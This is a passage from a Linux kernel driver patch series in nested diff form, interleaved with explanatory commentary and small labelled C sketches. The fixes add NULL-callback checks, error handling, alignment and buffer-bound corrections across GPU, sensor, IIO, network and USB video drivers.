+ 		adev->gfx.gfx_off_residency = residency;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
+index cd8b0ab0112ae..c79bff02a31a0 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
+@@ -1939,7 +1939,8 @@ static int aldebaran_mode2_reset(struct smu_context *smu)
+ 
+ 	index = smu_cmn_to_asic_specific_index(smu, CMN2ASIC_MAPPING_MSG,
+ 						SMU_MSG_GfxDeviceDriverReset);
+-
++	if (index < 0)
++		return -EINVAL;
+ 	mutex_lock(&smu->message_lock);
+ 	if (smu_version >= 0x00441400) {
+ 		ret = smu_cmn_send_msg_without_waiting(smu, (uint16_t)index, SMU_RESET_MODE_2);
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index 926ab5c3c31ab..0af2bd8706e44 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -1841,7 +1841,7 @@ static irqreturn_t tc_irq_handler(int irq, void *arg)
+ 		dev_err(tc->dev, "syserr %x\n", stat);
+ 	}
+ 
+-	if (tc->hpd_pin >= 0 && tc->bridge.dev) {
++	if (tc->hpd_pin >= 0 && tc->bridge.dev && tc->aux.drm_dev) {
+ 		/*
+ 		 * H is triggered when the GPIO goes high.
+ 		 *
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 5db52d6c5c35c..039da0d1a613b 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -414,6 +414,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "ONE XPLAYER"),
+ 		},
+ 		.driver_data = (void *)&lcd1600x2560_leftside_up,
++	}, {	/* OrangePi Neo */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "OrangePi"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "NEO-01"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Samsung GalaxyBook 10.6 */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "SAMSUNG ELECTRONICS CO., LTD."),
+diff --git a/drivers/gpu/drm/meson/meson_plane.c b/drivers/gpu/drm/meson/meson_plane.c
+index 815dfe30492b6..b43ac61201f31 100644
+--- a/drivers/gpu/drm/meson/meson_plane.c
++++ b/drivers/gpu/drm/meson/meson_plane.c
+@@ -534,6 +534,7 @@ int meson_plane_create(struct meson_drm *priv)
+ 	struct meson_plane *meson_plane;
+ 	struct drm_plane *plane;
+ 	const uint64_t *format_modifiers = format_modifiers_default;
++	int ret;
+ 
+ 	meson_plane = devm_kzalloc(priv->drm->dev, sizeof(*meson_plane),
+ 				   GFP_KERNEL);
+@@ -548,12 +549,16 @@ int meson_plane_create(struct meson_drm *priv)
+ 	else if (meson_vpu_is_compatible(priv, VPU_COMPATIBLE_G12A))
+ 		format_modifiers = format_modifiers_afbc_g12a;
+ 
+-	drm_universal_plane_init(priv->drm, plane, 0xFF,
+-				 &meson_plane_funcs,
+-				 supported_drm_formats,
+-				 ARRAY_SIZE(supported_drm_formats),
+-				 format_modifiers,
+-				 DRM_PLANE_TYPE_PRIMARY, "meson_primary_plane");
++	ret = drm_universal_plane_init(priv->drm, plane, 0xFF,
++					&meson_plane_funcs,
++					supported_drm_formats,
++					ARRAY_SIZE(supported_drm_formats),
++					format_modifiers,
++					DRM_PLANE_TYPE_PRIMARY, "meson_primary_plane");
++	if (ret) {
++		devm_kfree(priv->drm->dev, meson_plane);
++		return ret;
++	}
+ 
+ 	drm_plane_helper_add(plane, &meson_plane_helper_funcs);
+ 
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index 43aa955ec120d..74a4901640346 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -153,8 +153,9 @@ static void read_tempreg_nb_f15(struct pci_dev *pdev, u32 *regval)
+ 
+ static void read_tempreg_nb_zen(struct pci_dev *pdev, u32 *regval)
+ {
+-	amd_smn_read(amd_pci_dev_to_node_id(pdev),
+-		     ZEN_REPORTED_TEMP_CTRL_BASE, regval);
++	if (amd_smn_read(amd_pci_dev_to_node_id(pdev),
++			 ZEN_REPORTED_TEMP_CTRL_BASE, regval))
++		*regval = 0;
+ }
+ 
+ static long get_raw_temp(struct k10temp_data *data)
+@@ -205,6 +206,7 @@ static int k10temp_read_temp(struct device *dev, u32 attr, int channel,
+ 			     long *val)
+ {
+ 	struct k10temp_data *data = dev_get_drvdata(dev);
++	int ret = -EOPNOTSUPP;
+ 	u32 regval;
+ 
+ 	switch (attr) {
+@@ -221,13 +223,17 @@ static int k10temp_read_temp(struct device *dev, u32 attr, int channel,
+ 				*val = 0;
+ 			break;
+ 		case 2 ... 13:		/* Tccd{1-12} */
+-			amd_smn_read(amd_pci_dev_to_node_id(data->pdev),
+-				     ZEN_CCD_TEMP(data->ccd_offset, channel - 2),
+-						  &regval);
++			ret = amd_smn_read(amd_pci_dev_to_node_id(data->pdev),
++					   ZEN_CCD_TEMP(data->ccd_offset, channel - 2),
++					   &regval);
++
++			if (ret)
++				return ret;
++
+ 			*val = (regval & ZEN_CCD_TEMP_MASK) * 125 - 49000;
+ 			break;
+ 		default:
+-			return -EOPNOTSUPP;
++			return ret;
+ 		}
+ 		break;
+ 	case hwmon_temp_max:
+@@ -243,7 +249,7 @@ static int k10temp_read_temp(struct device *dev, u32 attr, int channel,
+ 			- ((regval >> 24) & 0xf)) * 500 + 52000;
+ 		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		return ret;
+ 	}
+ 	return 0;
+ }
+@@ -381,8 +387,20 @@ static void k10temp_get_ccd_support(struct pci_dev *pdev,
+ 	int i;
+ 
+ 	for (i = 0; i < limit; i++) {
+-		amd_smn_read(amd_pci_dev_to_node_id(pdev),
+-			     ZEN_CCD_TEMP(data->ccd_offset, i), &regval);
++		/*
++		 * Ignore inaccessible CCDs.
++		 *
++		 * Some systems will return a register value of 0, and the TEMP_VALID
++		 * bit check below will naturally fail.
++		 *
++		 * Other systems will return a PCI_ERROR_RESPONSE (0xFFFFFFFF) for
++		 * the register value. And this will incorrectly pass the TEMP_VALID
++		 * bit check.
++		 */
++		if (amd_smn_read(amd_pci_dev_to_node_id(pdev),
++				 ZEN_CCD_TEMP(data->ccd_offset, i), &regval))
++			continue;
++
+ 		if (regval & ZEN_CCD_TEMP_VALID)
+ 			data->show_temp |= BIT(TCCD_BIT(i));
+ 	}
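
The comment in the hunk above is the whole story: a PCI error response reads
back as all ones, so any payload bit test passes and only the read's return
code can be trusted. A two-line demonstration, with the bit position assumed
for the demo:

    #include <stdint.h>
    #include <stdio.h>

    #define ZEN_CCD_TEMP_VALID (1u << 11)  /* bit position assumed for demo */

    int main(void)
    {
            uint32_t err = 0xFFFFFFFF;     /* PCI error response pattern */

            /* All-ones passes any single-bit validity test, so the read's
             * return code, not the payload, must gate the check.
             */
            printf("valid bit set on error pattern: %s\n",
                   (err & ZEN_CCD_TEMP_VALID) ? "yes (bogus)" : "no");
            return 0;
    }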
+diff --git a/drivers/hwspinlock/hwspinlock_core.c b/drivers/hwspinlock/hwspinlock_core.c
+index fd5f5c5a5244d..425597151dd3e 100644
+--- a/drivers/hwspinlock/hwspinlock_core.c
++++ b/drivers/hwspinlock/hwspinlock_core.c
+@@ -302,6 +302,34 @@ void __hwspin_unlock(struct hwspinlock *hwlock, int mode, unsigned long *flags)
+ }
+ EXPORT_SYMBOL_GPL(__hwspin_unlock);
+ 
++/**
++ * hwspin_lock_bust() - bust a specific hwspinlock
++ * @hwlock: a previously-acquired hwspinlock which we want to bust
++ * @id: identifier of the remote lock holder, if applicable
++ *
++ * This function will bust a hwspinlock that was previously acquired as
++ * long as the current owner of the lock matches the id given by the caller.
++ *
++ * Context: Process context.
++ *
++ * Returns: 0 on success, -EINVAL if the hwspinlock does not exist or the
++ * bust operation fails, and -EOPNOTSUPP if the bust operation is not
++ * defined for the hwspinlock.
++ */
++int hwspin_lock_bust(struct hwspinlock *hwlock, unsigned int id)
++{
++	if (WARN_ON(!hwlock))
++		return -EINVAL;
++
++	if (!hwlock->bank->ops->bust) {
++		pr_err("bust operation not defined\n");
++		return -EOPNOTSUPP;
++	}
++
++	return hwlock->bank->ops->bust(hwlock, id);
++}
++EXPORT_SYMBOL_GPL(hwspin_lock_bust);
++
+ /**
+  * of_hwspin_lock_simple_xlate - translate hwlock_spec to return a lock id
+  * @bank: the hwspinlock device bank
+diff --git a/drivers/hwspinlock/hwspinlock_internal.h b/drivers/hwspinlock/hwspinlock_internal.h
+index 29892767bb7a0..f298fc0ee5adb 100644
+--- a/drivers/hwspinlock/hwspinlock_internal.h
++++ b/drivers/hwspinlock/hwspinlock_internal.h
+@@ -21,6 +21,8 @@ struct hwspinlock_device;
+  * @trylock: make a single attempt to take the lock. returns 0 on
+  *	     failure and true on success. may _not_ sleep.
+  * @unlock:  release the lock. always succeed. may _not_ sleep.
++ * @bust:    optional, platform-specific bust handler, called by hwspinlock
++ *	     core to bust a specific lock.
+  * @relax:   optional, platform-specific relax handler, called by hwspinlock
+  *	     core while spinning on a lock, between two successive
+  *	     invocations of @trylock. may _not_ sleep.
+@@ -28,6 +30,7 @@ struct hwspinlock_device;
+ struct hwspinlock_ops {
+ 	int (*trylock)(struct hwspinlock *lock);
+ 	void (*unlock)(struct hwspinlock *lock);
++	int (*bust)(struct hwspinlock *lock, unsigned int id);
+ 	void (*relax)(struct hwspinlock *lock);
+ };
+ 
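
On the provider side, a platform driver opts in by filling the new hook. A
sketch of what an implementation might look like, assuming a hypothetical
MMIO lock bank where each lock word stores the current owner id and writing
zero releases it; register layout, ids, and the trylock protocol are invented
for illustration, and real hardware differs:

    /* Needs <linux/io.h> plus the driver-internal "hwspinlock_internal.h". */

    #define DEMO_OWNER_ID	1	/* this core's id, invented for the demo */

    static int demo_hwlock_trylock(struct hwspinlock *lock)
    {
            void __iomem *reg = lock->priv;	/* set at probe time */

            /* Not a real atomic claim protocol; purely illustrative. */
            writel(DEMO_OWNER_ID, reg);
            return readl(reg) == DEMO_OWNER_ID;	/* 1 on success */
    }

    static void demo_hwlock_unlock(struct hwspinlock *lock)
    {
            writel(0, lock->priv);
    }

    static int demo_hwlock_bust(struct hwspinlock *lock, unsigned int id)
    {
            void __iomem *reg = lock->priv;

            if (readl(reg) != id)	/* refuse to bust another owner's lock */
                    return -EINVAL;

            writel(0, reg);
            return 0;
    }

    static const struct hwspinlock_ops demo_hwlock_ops = {
            .trylock = demo_hwlock_trylock,
            .unlock  = demo_hwlock_unlock,
            .bust    = demo_hwlock_bust,
    };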
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index 135a86fc94531..162845543efe0 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -767,9 +767,11 @@ static ssize_t iio_read_channel_info(struct device *dev,
+ 							INDIO_MAX_RAW_ELEMENTS,
+ 							vals, &val_len,
+ 							this_attr->address);
+-	else
++	else if (indio_dev->info->read_raw)
+ 		ret = indio_dev->info->read_raw(indio_dev, this_attr->c,
+ 				    &vals[0], &vals[1], this_attr->address);
++	else
++		return -EINVAL;
+ 
+ 	if (ret < 0)
+ 		return ret;
+@@ -851,6 +853,9 @@ static ssize_t iio_read_channel_info_avail(struct device *dev,
+ 	int length;
+ 	int type;
+ 
++	if (!indio_dev->info->read_avail)
++		return -EINVAL;
++
+ 	ret = indio_dev->info->read_avail(indio_dev, this_attr->c,
+ 					  &vals, &type, &length,
+ 					  this_attr->address);
+diff --git a/drivers/iio/industrialio-event.c b/drivers/iio/industrialio-event.c
+index 727e2ef66aa4b..14658b41c9bc6 100644
+--- a/drivers/iio/industrialio-event.c
++++ b/drivers/iio/industrialio-event.c
+@@ -283,6 +283,9 @@ static ssize_t iio_ev_state_store(struct device *dev,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (!indio_dev->info->write_event_config)
++		return -EINVAL;
++
+ 	ret = indio_dev->info->write_event_config(indio_dev,
+ 		this_attr->c, iio_ev_attr_type(this_attr),
+ 		iio_ev_attr_dir(this_attr), val);
+@@ -298,6 +301,9 @@ static ssize_t iio_ev_state_show(struct device *dev,
+ 	struct iio_dev_attr *this_attr = to_iio_dev_attr(attr);
+ 	int val;
+ 
++	if (!indio_dev->info->read_event_config)
++		return -EINVAL;
++
+ 	val = indio_dev->info->read_event_config(indio_dev,
+ 		this_attr->c, iio_ev_attr_type(this_attr),
+ 		iio_ev_attr_dir(this_attr));
+@@ -316,6 +322,9 @@ static ssize_t iio_ev_value_show(struct device *dev,
+ 	int val, val2, val_arr[2];
+ 	int ret;
+ 
++	if (!indio_dev->info->read_event_value)
++		return -EINVAL;
++
+ 	ret = indio_dev->info->read_event_value(indio_dev,
+ 		this_attr->c, iio_ev_attr_type(this_attr),
+ 		iio_ev_attr_dir(this_attr), iio_ev_attr_info(this_attr),
+diff --git a/drivers/iio/inkern.c b/drivers/iio/inkern.c
+index 872fd5c241476..bd854e92c6f8c 100644
+--- a/drivers/iio/inkern.c
++++ b/drivers/iio/inkern.c
+@@ -561,6 +561,7 @@ EXPORT_SYMBOL_GPL(devm_iio_channel_get_all);
+ static int iio_channel_read(struct iio_channel *chan, int *val, int *val2,
+ 			    enum iio_chan_info_enum info)
+ {
++	const struct iio_info *iio_info = chan->indio_dev->info;
+ 	int unused;
+ 	int vals[INDIO_MAX_RAW_ELEMENTS];
+ 	int ret;
+@@ -572,15 +573,18 @@ static int iio_channel_read(struct iio_channel *chan, int *val, int *val2,
+ 	if (!iio_channel_has_info(chan->channel, info))
+ 		return -EINVAL;
+ 
+-	if (chan->indio_dev->info->read_raw_multi) {
+-		ret = chan->indio_dev->info->read_raw_multi(chan->indio_dev,
+-					chan->channel, INDIO_MAX_RAW_ELEMENTS,
+-					vals, &val_len, info);
++	if (iio_info->read_raw_multi) {
++		ret = iio_info->read_raw_multi(chan->indio_dev,
++					       chan->channel,
++					       INDIO_MAX_RAW_ELEMENTS,
++					       vals, &val_len, info);
+ 		*val = vals[0];
+ 		*val2 = vals[1];
++	} else if (iio_info->read_raw) {
++		ret = iio_info->read_raw(chan->indio_dev,
++					 chan->channel, val, val2, info);
+ 	} else {
+-		ret = chan->indio_dev->info->read_raw(chan->indio_dev,
+-					chan->channel, val, val2, info);
++		return -EINVAL;
+ 	}
+ 
+ 	return ret;
+@@ -800,11 +804,15 @@ static int iio_channel_read_avail(struct iio_channel *chan,
+ 				  const int **vals, int *type, int *length,
+ 				  enum iio_chan_info_enum info)
+ {
++	const struct iio_info *iio_info = chan->indio_dev->info;
++
+ 	if (!iio_channel_has_available(chan->channel, info))
+ 		return -EINVAL;
+ 
+-	return chan->indio_dev->info->read_avail(chan->indio_dev, chan->channel,
+-						 vals, type, length, info);
++	if (iio_info->read_avail)
++		return iio_info->read_avail(chan->indio_dev, chan->channel,
++					    vals, type, length, info);
++	return -EINVAL;
+ }
+ 
+ int iio_read_avail_channel_attribute(struct iio_channel *chan,
+@@ -935,8 +943,12 @@ EXPORT_SYMBOL_GPL(iio_get_channel_type);
+ static int iio_channel_write(struct iio_channel *chan, int val, int val2,
+ 			     enum iio_chan_info_enum info)
+ {
+-	return chan->indio_dev->info->write_raw(chan->indio_dev,
+-						chan->channel, val, val2, info);
++	const struct iio_info *iio_info = chan->indio_dev->info;
++
++	if (iio_info->write_raw)
++		return iio_info->write_raw(chan->indio_dev,
++					   chan->channel, val, val2, info);
++	return -EINVAL;
+ }
+ 
+ int iio_write_channel_attribute(struct iio_channel *chan, int val, int val2,
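
All four IIO hunks apply one defensive pattern: every callback in struct iio_info is optional, so the core must test the pointer and fall back to -EINVAL instead of dereferencing NULL. Reduced to a single accessor (a sketch; the read_raw_multi branch of the real function is omitted):

    static int iio_read_one_sketch(struct iio_channel *chan, int *val,
    			       int *val2, enum iio_chan_info_enum info)
    {
    	const struct iio_info *iio_info = chan->indio_dev->info;

    	if (iio_info->read_raw)
    		return iio_info->read_raw(chan->indio_dev, chan->channel,
    					  val, val2, info);

    	/* Callback not wired up: fail instead of dereferencing NULL. */
    	return -EINVAL;
    }
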
+diff --git a/drivers/infiniband/hw/efa/efa_com.c b/drivers/infiniband/hw/efa/efa_com.c
+index 16a24a05fc2a6..bafd210dd43e8 100644
+--- a/drivers/infiniband/hw/efa/efa_com.c
++++ b/drivers/infiniband/hw/efa/efa_com.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0 OR BSD-2-Clause
+ /*
+- * Copyright 2018-2021 Amazon.com, Inc. or its affiliates. All rights reserved.
++ * Copyright 2018-2024 Amazon.com, Inc. or its affiliates. All rights reserved.
+  */
+ 
+ #include "efa_com.h"
+@@ -406,8 +406,8 @@ static struct efa_comp_ctx *efa_com_submit_admin_cmd(struct efa_com_admin_queue
+ 	return comp_ctx;
+ }
+ 
+-static void efa_com_handle_single_admin_completion(struct efa_com_admin_queue *aq,
+-						   struct efa_admin_acq_entry *cqe)
++static int efa_com_handle_single_admin_completion(struct efa_com_admin_queue *aq,
++						  struct efa_admin_acq_entry *cqe)
+ {
+ 	struct efa_comp_ctx *comp_ctx;
+ 	u16 cmd_id;
+@@ -416,11 +416,11 @@ static void efa_com_handle_single_admin_completion(struct efa_com_admin_queue *a
+ 			 EFA_ADMIN_ACQ_COMMON_DESC_COMMAND_ID);
+ 
+ 	comp_ctx = efa_com_get_comp_ctx(aq, cmd_id, false);
+-	if (!comp_ctx) {
++	if (comp_ctx->status != EFA_CMD_SUBMITTED) {
+ 		ibdev_err(aq->efa_dev,
+-			  "comp_ctx is NULL. Changing the admin queue running state\n");
+-		clear_bit(EFA_AQ_STATE_RUNNING_BIT, &aq->state);
+-		return;
++			  "Received completion with unexpected command id[%d], sq producer: %d, sq consumer: %d, cq consumer: %d\n",
++			  cmd_id, aq->sq.pc, aq->sq.cc, aq->cq.cc);
++		return -EINVAL;
+ 	}
+ 
+ 	comp_ctx->status = EFA_CMD_COMPLETED;
+@@ -428,14 +428,17 @@ static void efa_com_handle_single_admin_completion(struct efa_com_admin_queue *a
+ 
+ 	if (!test_bit(EFA_AQ_STATE_POLLING_BIT, &aq->state))
+ 		complete(&comp_ctx->wait_event);
++
++	return 0;
+ }
+ 
+ static void efa_com_handle_admin_completion(struct efa_com_admin_queue *aq)
+ {
+ 	struct efa_admin_acq_entry *cqe;
+ 	u16 queue_size_mask;
+-	u16 comp_num = 0;
++	u16 comp_cmds = 0;
+ 	u8 phase;
++	int err;
+ 	u16 ci;
+ 
+ 	queue_size_mask = aq->depth - 1;
+@@ -453,10 +456,12 @@ static void efa_com_handle_admin_completion(struct efa_com_admin_queue *aq)
+ 		 * phase bit was validated
+ 		 */
+ 		dma_rmb();
+-		efa_com_handle_single_admin_completion(aq, cqe);
++		err = efa_com_handle_single_admin_completion(aq, cqe);
++		if (!err)
++			comp_cmds++;
+ 
++		aq->cq.cc++;
+ 		ci++;
+-		comp_num++;
+ 		if (ci == aq->depth) {
+ 			ci = 0;
+ 			phase = !phase;
+@@ -465,10 +470,9 @@ static void efa_com_handle_admin_completion(struct efa_com_admin_queue *aq)
+ 		cqe = &aq->cq.entries[ci];
+ 	}
+ 
+-	aq->cq.cc += comp_num;
+ 	aq->cq.phase = phase;
+-	aq->sq.cc += comp_num;
+-	atomic64_add(comp_num, &aq->stats.completed_cmd);
++	aq->sq.cc += comp_cmds;
++	atomic64_add(comp_cmds, &aq->stats.completed_cmd);
+ }
+ 
+ static int efa_com_comp_status_to_errno(u8 comp_status)
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index 191db831d7606..004511d918c64 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -666,16 +666,26 @@ static int uvc_parse_streaming(struct uvc_device *dev,
+ 		goto error;
+ 	}
+ 
+-	size = nformats * sizeof(*format) + nframes * sizeof(*frame)
++	/*
++	 * Allocate memory for the formats, the frames and the intervals,
++	 * plus any required padding to guarantee that everything has the
++	 * correct alignment.
++	 */
++	size = nformats * sizeof(*format);
++	size = ALIGN(size, __alignof__(*frame)) + nframes * sizeof(*frame);
++	size = ALIGN(size, __alignof__(*interval))
+ 	     + nintervals * sizeof(*interval);
++
+ 	format = kzalloc(size, GFP_KERNEL);
+-	if (format == NULL) {
++	if (!format) {
+ 		ret = -ENOMEM;
+ 		goto error;
+ 	}
+ 
+-	frame = (struct uvc_frame *)&format[nformats];
+-	interval = (u32 *)&frame[nframes];
++	frame = (void *)format + nformats * sizeof(*format);
++	frame = PTR_ALIGN(frame, __alignof__(*frame));
++	interval = (void *)frame + nframes * sizeof(*frame);
++	interval = PTR_ALIGN(interval, __alignof__(*interval));
+ 
+ 	streaming->format = format;
+ 	streaming->nformats = 0;
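
The allocation packs three differently typed arrays into one kzalloc() while keeping each naturally aligned: the running size is rounded up with ALIGN() before each array is appended, and the same rounding is replayed with PTR_ALIGN() when the pointers are carved back out. A self-contained model of the arithmetic (struct sizes are invented; the kernel macros are re-implemented here so the sketch builds in userspace):

    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>

    /* Userspace stand-ins for the kernel's ALIGN()/PTR_ALIGN(). */
    #define ALIGN(x, a)     (((x) + (a) - 1) & ~((uintptr_t)(a) - 1))
    #define PTR_ALIGN(p, a) ((void *)ALIGN((uintptr_t)(p), (a)))

    struct fmt { uint64_t a; uint8_t b; };	/* invented: size 16, align 8 */
    struct frm { uint32_t x; };		/* invented: size 4,  align 4 */

    int main(void)
    {
    	size_t nfmt = 3, nfrm = 5, nivl = 7, size;
    	struct fmt *fmt;
    	struct frm *frm;
    	uint32_t *ivl;

    	/* Grow the total with the same ALIGN() steps used when
    	 * carving, so padding is accounted for exactly once. */
    	size = nfmt * sizeof(*fmt);
    	size = ALIGN(size, __alignof__(*frm)) + nfrm * sizeof(*frm);
    	size = ALIGN(size, __alignof__(*ivl)) + nivl * sizeof(*ivl);

    	fmt = calloc(1, size);
    	if (!fmt)
    		return 1;

    	/* Replay the rounding when deriving the inner pointers. */
    	frm = PTR_ALIGN((char *)fmt + nfmt * sizeof(*fmt), __alignof__(*frm));
    	ivl = PTR_ALIGN((char *)frm + nfrm * sizeof(*frm), __alignof__(*ivl));

    	printf("fmt=%p frm=%p ivl=%p (%zu bytes total)\n",
    	       (void *)fmt, (void *)frm, (void *)ivl, size);
    	free(fmt);
    	return 0;
    }
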
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+index 97d1cfec4ec03..ccddfa49e96c0 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+@@ -2141,7 +2141,8 @@ static void mlx5e_handle_rx_cqe_mpwrq_shampo(struct mlx5e_rq *rq, struct mlx5_cq
+ 	if (flush)
+ 		mlx5e_shampo_flush_skb(rq, cqe, match);
+ free_hd_entry:
+-	mlx5e_free_rx_shampo_hd_entry(rq, header_index);
++	if (likely(head_size))
++		mlx5e_free_rx_shampo_hd_entry(rq, header_index);
+ mpwrq_cqe_out:
+ 	if (likely(wi->consumed_strides < rq->mpwqe.num_strides))
+ 		return;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index d34aea85f8a69..14865fc245dae 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -230,7 +230,7 @@ static int ionic_request_irq(struct ionic_lif *lif, struct ionic_qcq *qcq)
+ 		name = dev_name(dev);
+ 
+ 	snprintf(intr->name, sizeof(intr->name),
+-		 "%s-%s-%s", IONIC_DRV_NAME, name, q->name);
++		 "%.5s-%.16s-%.8s", IONIC_DRV_NAME, name, q->name);
+ 
+ 	return devm_request_irq(dev, intr->vector, ionic_isr,
+ 				0, intr->name, &qcq->napi);
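
The new format bounds every component: at most 5, 16 and 8 characters plus two separators and a NUL is 32 bytes, so the result provably fits a fixed-size name buffer and format-truncation warnings go quiet. A standalone illustration (the 32-byte size and the strings are assumptions):

    #include <stdio.h>

    int main(void)
    {
    	char name[32];	/* assumed size of the driver's intr->name */
    	int n;

    	/* "%.Ns" caps each field, so 5 + 1 + 16 + 1 + 8 + 1 = 32 is
    	 * the worst case and truncation can never occur. */
    	n = snprintf(name, sizeof(name), "%.5s-%.16s-%.8s",
    		     "ionic", "a-very-long-device-name", "q-name-that-is-long");
    	printf("%s (wanted %d bytes)\n", name, n);
    	return 0;
    }
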
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index ee0ea3d0f50ee..72a2c41b9dbf8 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1436,6 +1436,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x2692, 0x9025, 4)},    /* Cellient MPL200 (rebranded Qualcomm 05c6:9025) */
+ 	{QMI_QUIRK_SET_DTR(0x1546, 0x1342, 4)},	/* u-blox LARA-L6 */
+ 	{QMI_QUIRK_SET_DTR(0x33f8, 0x0104, 4)}, /* Rolling RW101 RMNET */
++	{QMI_FIXED_INTF(0x2dee, 0x4d22, 5)},    /* MeiG Smart SRM825L */
+ 
+ 	/* 4. Gobi 1000 devices */
+ 	{QMI_GOBI1K_DEVICE(0x05c6, 0x9212)},	/* Acer Gobi Modem Device */
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 61cc0ed1ddc13..e3e5107adaca6 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -1638,7 +1638,7 @@ static bool is_xdp_raw_buffer_queue(struct virtnet_info *vi, int q)
+ 		return false;
+ }
+ 
+-static void virtnet_poll_cleantx(struct receive_queue *rq)
++static void virtnet_poll_cleantx(struct receive_queue *rq, int budget)
+ {
+ 	struct virtnet_info *vi = rq->vq->vdev->priv;
+ 	unsigned int index = vq2rxq(rq->vq);
+@@ -1656,7 +1656,7 @@ static void virtnet_poll_cleantx(struct receive_queue *rq)
+ 
+ 		do {
+ 			virtqueue_disable_cb(sq->vq);
+-			free_old_xmit_skbs(sq, true);
++			free_old_xmit_skbs(sq, !!budget);
+ 		} while (unlikely(!virtqueue_enable_cb_delayed(sq->vq)));
+ 
+ 		if (sq->vq->num_free >= 2 + MAX_SKB_FRAGS)
+@@ -1675,7 +1675,7 @@ static int virtnet_poll(struct napi_struct *napi, int budget)
+ 	unsigned int received;
+ 	unsigned int xdp_xmit = 0;
+ 
+-	virtnet_poll_cleantx(rq);
++	virtnet_poll_cleantx(rq, budget);
+ 
+ 	received = virtnet_receive(rq, budget, &xdp_xmit);
+ 
+@@ -1778,7 +1778,7 @@ static int virtnet_poll_tx(struct napi_struct *napi, int budget)
+ 	txq = netdev_get_tx_queue(vi->dev, index);
+ 	__netif_tx_lock(txq, raw_smp_processor_id());
+ 	virtqueue_disable_cb(sq->vq);
+-	free_old_xmit_skbs(sq, true);
++	free_old_xmit_skbs(sq, !!budget);
+ 
+ 	if (sq->vq->num_free >= 2 + MAX_SKB_FRAGS)
+ 		netif_tx_wake_queue(txq);
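
Both call sites now forward the NAPI budget as the in_napi argument: budget == 0 identifies callers such as netpoll that run outside normal NAPI context, where the per-CPU skb cache behind napi_consume_skb() must not be used. A schematic poll function (my_queue and my_receive are invented; the budget rule is the one the hunks encode):

    static int my_poll(struct napi_struct *napi, int budget)
    {
    	struct my_queue *q = container_of(napi, struct my_queue, napi);

    	/*
    	 * Forwarding !!budget as the in_napi flag makes the
    	 * skb-freeing helper end in napi_consume_skb(skb, 0) for
    	 * zero-budget callers, which falls back to the any-context
    	 * dev_consume_skb_any() path.
    	 */
    	free_old_xmit_skbs(q->sq, !!budget);

    	return my_receive(q, budget);
    }
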
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 01b02c03fa89c..764cd320c6c18 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -2293,7 +2293,7 @@ static int ath11k_qmi_load_file_target_mem(struct ath11k_base *ab,
+ 	struct qmi_txn txn;
+ 	const u8 *temp = data;
+ 	void __iomem *bdf_addr = NULL;
+-	int ret;
++	int ret = 0;
+ 	u32 remaining = len;
+ 
+ 	req = kzalloc(sizeof(*req), GFP_KERNEL);
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+index 7d4340c56628a..51bb544853514 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+@@ -252,8 +252,7 @@ static ssize_t iwl_dbgfs_send_hcmd_write(struct iwl_fw_runtime *fwrt, char *buf,
+ 		.data = { NULL, },
+ 	};
+ 
+-	if (fwrt->ops && fwrt->ops->fw_running &&
+-	    !fwrt->ops->fw_running(fwrt->ops_ctx))
++	if (!iwl_trans_fw_running(fwrt->trans))
